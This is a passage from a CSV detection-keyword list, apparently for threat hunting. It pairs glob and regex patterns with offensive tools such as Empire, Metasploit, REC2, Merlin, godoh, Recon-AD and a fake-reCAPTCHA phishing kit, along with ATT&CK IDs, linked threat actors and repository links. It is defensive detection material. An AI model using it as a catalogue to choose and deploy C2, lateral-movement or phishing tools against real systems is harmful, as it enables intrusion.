"*Reaper-main.zip*",".{0,1000}Reaper\-main\.zip.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","56501"
"*rebootuser/LinEnum*",".{0,1000}rebootuser\/LinEnum.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56502"
"*rec_rans@aol.com*",".{0,1000}rec_rans\@aol\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56503"
"*REC2 implant for Mastodon*",".{0,1000}REC2\simplant\sfor\sMastodon.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56504"
"*REC2 implant for VirusTotal*",".{0,1000}REC2\simplant\sfor\sVirusTotal.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56505"
"*rec2::modules::rec2mastodon*",".{0,1000}rec2\:\:modules\:\:rec2mastodon.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56506"
"*rec2_mastodon_x64.exe*",".{0,1000}rec2_mastodon_x64\.exe.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56507"
"*rec2_virustotal_x64.exe*",".{0,1000}rec2_virustotal_x64\.exe.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56508"
"*rec2mastodon.rs*",".{0,1000}rec2mastodon\.rs.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56509"
"*rec2virustotal*",".{0,1000}rec2virustotal.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56510"
"*rec2virustotal.rs*",".{0,1000}rec2virustotal\.rs.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","56511"
"*reCAPTCHA Verification ID: <span id=""verification-id"">146820</span>*",".{0,1000}reCAPTCHA\sVerification\sID\:\s\<span\sid\=\""verification\-id\""\>146820\<\/span\>.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","#content","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","56512"
"*recaptcha-phish-main.zip*",".{0,1000}recaptcha\-phish\-main\.zip.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","1","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","56513"
"*Receive a file via DoH*",".{0,1000}Receive\sa\sfile\svia\sDoH.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","56514"
"*Receive-AgentJob*",".{0,1000}Receive\-AgentJob.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","56515"
"*Received Mythic SOCKS task: *",".{0,1000}Received\sMythic\sSOCKS\stask\:\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","56516"
"*Received version from PSEXECSVC: *",".{0,1000}Received\sversion\sfrom\sPSEXECSVC\:\s.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","#content","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","56518"
"*reciclador.cpp*",".{0,1000}reciclador\.cpp.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","N/A","10","8","741","114","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z","56519"
"*reciclador.dll*",".{0,1000}reciclador\.dll.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","N/A","10","8","741","114","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z","56520"
"*reciclador.vcxproj*",".{0,1000}reciclador\.vcxproj.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","N/A","10","8","741","114","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z","56521"
"*recon_passive.rb*",".{0,1000}recon_passive\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56522"
"*Recon-AD-*.dll*",".{0,1000}Recon\-AD\-.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56523"
"*Recon-AD-*.sln*",".{0,1000}Recon\-AD\-.{0,1000}\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56524"
"*Recon-AD-*.vcxproj*",".{0,1000}Recon\-AD\-.{0,1000}\.vcxproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56525"
"*Recon-AD-AllLocalGroups*",".{0,1000}Recon\-AD\-AllLocalGroups.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56526"
"*Recon-AD-Computers All*",".{0,1000}Recon\-AD\-Computers\sAll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56527"
"*Recon-AD-Domain*",".{0,1000}Recon\-AD\-Domain.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56528"
"*Recon-AD-Groups All*",".{0,1000}Recon\-AD\-Groups\sAll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56529"
"*Recon-AD-LocalGroups*",".{0,1000}Recon\-AD\-LocalGroups.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56530"
"*Recon-AD-SPNs*",".{0,1000}Recon\-AD\-SPNs.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56531"
"*Recon-AD-Users All*",".{0,1000}Recon\-AD\-Users\sAll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56532"
"*Recon-AD-Users.*",".{0,1000}Recon\-AD\-Users\..{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","56533"
"*recon-archy analyse*",".{0,1000}recon\-archy\sanalyse.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","N/A","7","1","17","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z","56534"
"*recon-archy build*",".{0,1000}recon\-archy\sbuild.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","N/A","7","1","17","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z","56535"
